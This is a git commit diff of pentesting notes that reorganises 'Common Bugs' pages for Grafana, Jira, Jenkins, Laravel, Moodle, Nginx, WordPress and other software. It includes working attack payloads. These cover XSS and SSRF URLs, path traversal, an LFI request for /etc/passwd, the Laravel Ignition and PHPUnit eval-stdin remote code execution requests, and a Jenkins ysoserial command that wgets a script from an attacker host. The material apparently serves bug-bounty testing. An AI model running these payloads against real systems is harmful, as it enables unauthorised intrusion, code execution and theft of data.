Adding some 'technology' information

This commit is contained in:
Muhammad Daffa 2022-06-18 20:26:55 +07:00
parent a2c07348e3
commit a0048665a1
9 changed files with 169 additions and 67 deletions

View File

@ -1,16 +1,16 @@
# Grafana # Grafana
1. CVE-2021-41174 (Reflected XSS) 1. CVE-2021-41174 (Reflected XSS)
``` ```
<GRAFANA URL>/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1 https://example.com/dashboard/snapshot/%7B%7Bconstructor.constructor('alert(1)')()%7D%7D?orgId=1
``` ```
2. CVE-2020-13379 (Denial of Service) 2. CVE-2020-13379 (Denial of Service)
``` ```
<GRAFANA URL>/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D https://example.com/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D
``` ```
3. CVE-2020-11110 (Stored XSS) 3. CVE-2020-11110 (Stored XSS)
``` ```
POST /api/snapshots HTTP/1.1 POST /api/snapshots HTTP/1.1
Host: <GRAFANA URL> Host: example.com
Accept: application/json, text/plain, */* Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5 Accept-Language: en-US,en;q=0.5
Referer: {{BaseURL}} Referer: {{BaseURL}}
@ -22,7 +22,7 @@ Connection: close
4. CVE-2019-15043 (Grafana Unauthenticated API) 4. CVE-2019-15043 (Grafana Unauthenticated API)
``` ```
POST /api/snapshots HTTP/1.1 POST /api/snapshots HTTP/1.1
Host: <GRAFANA URL> Host: example.com
Connection: close Connection: close
Content-Length: 235 Content-Length: 235
Accept: */* Accept: */*
@ -37,5 +37,5 @@ Try to login using admin as username and password
``` ```
6. Signup Enabled 6. Signup Enabled
``` ```
<GRAFANA URL>/signup https://example.com/signup
``` ```

View File

@ -1,4 +1,11 @@
# HAProxy # HAProxy Common Bugs
## Introduction
What would you do if you came across a website that uses HAProxy?
## How to Detect
-
1. CVE-2021-40346 (HTTP Request Smuggling) 1. CVE-2021-40346 (HTTP Request Smuggling)
``` ```
POST /index.html HTTP/1.1 POST /index.html HTTP/1.1

View File

@ -1,5 +1,18 @@
## Jenkins # Jenkins Common Bugs
1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
## Introduction
What would you do if you came across a website that uses Jenkins?
## How to Detect
Usually in the HTTP response there is a header like this `X-Jenkins`
1. Find the related CVE by checking jenkins version
* How to find the jenkins version
By checking the response header `X-Jenkins`, sometimes the version is printed there. If you found outdated jenkins version, find the exploit at [pwn_jenkins](https://github.com/gquere/pwn_jenkins)
Some example CVE:
- Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload. Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload.
Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py): Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py):
@ -9,7 +22,7 @@ java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.s
./jenkins_rce.py jenkins_ip jenkins_port payload.out ./jenkins_rce.py jenkins_ip jenkins_port payload.out
``` ```
2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1) - Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html). Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
@ -18,13 +31,9 @@ If the Jenkins requests authentication but returns valid data using the followin
curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
``` ```
3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce).
Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc). Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc).
4. CVE-2019-1003030 - CheckScript RCE in Jenkins (CVE-2019-1003030)
How to Exploit: How to Exploit:
- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html) - [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html)
@ -56,11 +65,15 @@ to
%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d %70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392) 2. Default Credentials
```
Try to login using admin as username and password
```
How to exploit: 3. Unauthenticated Jenkins Dashboard
- [@jas502n](https://github.com/jas502n/CVE-2019-10392) ```
- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html) Access https://target.com and if there is no login form then it is vulnerable
```
Reference: ## Reference
- https://github.com/gquere/pwn_jenkins * [pwn_jenkins](https://github.com/gquere/pwn_jenkins)

View File

@ -1,48 +1,65 @@
# Unauthenticated Jira CVEs # Jira Common Bugs
1. CVE-2017-9506 (SSRF)
## Introduction
What would you do if you came across a website that uses Jira?
## How to Detect
``` ```
https://<JIRA_URL>/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD> https://example.com/secure/Dashboard.jspa
https://example.com/login.jsp
``` ```
2. CVE-2018-20824 (XSS)
1. Find the related CVE by checking jira version
* How to find the jira version
Try to request to `https://example.com/secure/Dashboard.jspa` and then check the source code. You will find this line `<meta name="ajs-version-number" content="8.20.9">` so 8.20.9 is the version jira. If you found outdated jira version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-3578/product_id-8170/Atlassian-Jira.html)
Some example CVE:
- CVE-2017-9506 (SSRF)
``` ```
https://<JIRA_URL>/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) https://example.com/plugins/servlet/oauth/users/icon-uri?consumerUri=<SSRF_PAYLOAD>
``` ```
3. CVE-2019-8451 (SSRF) - CVE-2018-20824 (XSS)
``` ```
https://<JIRA_URL>/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:1337@example.com https://example.com/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
``` ```
4. CVE-2019-8449 (User Information Disclosure) - CVE-2019-8451 (SSRF)
``` ```
https://<JIRA_URL>/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true https://example.com/plugins/servlet/gadgets/makeRequest?url=https://<HOST_NAME>:1337@example.com
``` ```
5. CVE-2019-8442 (Sensitive Information Disclosure) - CVE-2019-8449 (User Information Disclosure)
``` ```
https://<JIRA_URL>/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml https://example.com/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true
``` ```
6. CVE-2019-3403 (User Enumeration) - CVE-2019-8442 (Sensitive Information Disclosure)
``` ```
https://<JIRA_URL>/rest/api/2/user/picker?query=<USERNAME_HERE> https://example.com/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
``` ```
7. CVE-2020-14181 (User Enumeration) - CVE-2019-3403 (User Enumeration)
``` ```
https://<JIRA_URL>/secure/ViewUserHover.jspa?username=<USERNAME> https://example.com/rest/api/2/user/picker?query=<USERNAME_HERE>
``` ```
8. CVE-2020-14178 (Project Key Enumeration) - CVE-2020-14181 (User Enumeration)
``` ```
https://<JIRA_URL>/browse.<PROJECT_KEY> https://example.com/secure/ViewUserHover.jspa?username=<USERNAME>
``` ```
9. CVE-2020-14179 (Information Disclosure) - CVE-2020-14178 (Project Key Enumeration)
``` ```
https://<JIRA_URL>/secure/QueryComponent!Default.jspa https://example.com/browse.<PROJECT_KEY>
``` ```
10. CVE-2019-11581 (Template Injection) - CVE-2020-14179 (Information Disclosure)
``` ```
<JIRA_URL>/secure/ContactAdministrators!default.jspa https://example.com/secure/QueryComponent!Default.jspa
```
- CVE-2019-11581 (Template Injection)
```
example.com/secure/ContactAdministrators!default.jspa
* Try the SSTI Payloads * Try the SSTI Payloads
``` ```
11. CVE-2019-3396 (Path Traversal) - CVE-2019-3396 (Path Traversal)
``` ```
POST /rest/tinymce/1/macro/preview HTTP/1.1 POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
@ -56,10 +73,19 @@ Connection: close
*Try above request with the Jira target *Try above request with the Jira target
``` ```
12. CVE-2019-3402 (XSS) - CVE-2019-3402 (XSS)
``` ```
https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search https://example.com/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
``` ```
Reference: 2. Signup enabled
- https://twitter.com/harshbothra ```
POST /servicedesk/customer/user/signup HTTP/1.1
Host: example.com
Content-Type: application/json
{"email":"test@gmail.com","signUpContext":{},"secondaryEmail":"","usingNewUi":true}
```
## Reference
* [@harshbothra](https://twitter.com/harshbothra)

View File

@ -1,26 +1,46 @@
# Common bug in laravel framework # Laravel Common Bugs
1. Laravel PHPUnit Remote Code Execution
* Full Path Exploit : http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
* Affected versions : Before 4.8.28 and 5.x before 5.6.3
Command ## Introduction
What would you do if you came across a website that uses Laravel?
## How to Detect
Usually in the HTTP response there is a header like this `Set-Cookie: laravel_session=`
1. Find the related CVE by checking laravel version
* How to find the laravel version
By checking the composer file in `https://example.com/composer.json`, sometimes the version is printed there. If you found outdated laravel version, find the CVEs at [CVEDetails](https://www.cvedetails.com/vulnerability-list/vendor_id-16542/product_id-38139/Laravel-Laravel.html)
Some example CVE:
- CVE-2021-3129 (Remote Code Execution)
``` ```
curl -d "<?php echo php_uname(); ?>" http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php POST /_ignition/execute-solution HTTP/1.1
Host: example.com
Accept: application/json
Content-Type: application/json
{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
``` ```
2. Exposed environment variables 2. Laravel 4.8.28 ~ 5.x - PHPUnit Remote Code Execution (CVE-2017-9841)
* Full Path Exploit : http://target.com/.env ```
curl -d "<?php echo php_uname(); ?>" http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
```
3. Exposed environment variables
* Full Path Exploit : http://example.com/.env
![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png) ![Environment Variables](https://1.bp.blogspot.com/-EUTxgP5XE6Q/XkgB4SyWSbI/AAAAAAAAAQA/eqtALOjLKKA46si-lIosm6cDVmxByjzIQCLcBGAsYHQ/s1600/1.png)
3. Exposed log files 4. Exposed log files
* Full Path Exploit : http://target.com/storage/logs/laravel.log * Full Path Exploit : http://example.com/storage/logs/laravel.log
4. Laravel Debug Mode Enabled 5. Laravel Debug Mode Enabled
* Using SQL injection query in GET or POST method * Try to request to https://example.com using POST method (Error 405)
* Try path /logout (ex:target.com/logout) * Using [] in paramater (ex:example.com/param[]=0)
* Using [] in paramater (ex:target.com/param[]=0)
![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png) ![Laravel Debug Mode](https://hacken.io/wp-content/uploads/2019/07/laravel-screen.png)
Source: [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html) ## References
* [Nakanosec](https://www.nakanosec.com/2020/02/common-bug-pada-laravel.html)

View File

@ -1,4 +1,10 @@
# Moodle # Moodle Common Bugs
## Introduction
What would you do if you came across a website that uses Moodle?
## How to Detect
If you visit `https://target.com` and see the source code, you will see `<meta name="keywords" content="moodle,`
1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter 1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter
``` ```
@ -8,5 +14,11 @@ https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter 2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter
``` ```
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com https://target.com/mod/lti/auth.php?redirect_uri=https://evil.com
```
3. LFI /filter/jmol/js/jsmol/php/jsmol.php in "query" parameter
```
https://target.com/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
``` ```

View File

@ -1,6 +1,17 @@
# Nginx # Nginx Common Bugs
1. Directory traversal ## Introduction
What would you do if you came across a website that uses Nginx?
## How to Detect
Usually in the HTTP response there is a header like this `Server: nginx`
1. Find the related CVE by checking nginx version
* How to find the nginx version
By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated nginx version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-315/product_id-101578/F5-Nginx.html)
2. Directory traversal
``` ```
https://example.com/folder1../folder1/folder2/static/main.css https://example.com/folder1../folder1/folder2/static/main.css
https://example.com/folder1../%s/folder2/static/main.css https://example.com/folder1../%s/folder2/static/main.css
@ -8,4 +19,9 @@ https://example.com/folder1/folder2../folder2/static/main.css
https://example.com/folder1/folder2../%s/static/main.css https://example.com/folder1/folder2../%s/static/main.css
https://example.com/folder1/folder2/static../static/main.css https://example.com/folder1/folder2/static../static/main.css
https://example.com/folder1/folder2/static../%s/main.css https://example.com/folder1/folder2/static../%s/main.css
```
3. Nginx status page
```
https://example.com/nginx_status
``` ```

View File

@ -3,6 +3,9 @@
## Introduction ## Introduction
What would you do if you came across a website that uses WordPress? What would you do if you came across a website that uses WordPress?
## How to Detect
If you visit `https://target.com` and see the source code, you will see the links to themes and plugins from WordPress. Or you can visit `https://target.com/wp-login.php`, it is the WordPress login admin page
1. Find the related CVE by checking the core, plugins, and theme version 1. Find the related CVE by checking the core, plugins, and theme version
* How to find the wordpress version * How to find the wordpress version
``` ```
@ -99,3 +102,8 @@ Host: target.com
</param></params> </param></params>
</methodCall> </methodCall>
``` ```
7. Register enabled
```
http://example.com/wp-login.php?action=register
```

View File

@ -1,10 +1,10 @@
# Common bug in Zend framework # Zend Common Bugs
## Introduction ## Introduction
What would you do if you came across a website that uses Zend? What would you do if you came across a website that uses Zend?
## How to Detect ## How to Detect
-
1. Finding config files 1. Finding config files
``` ```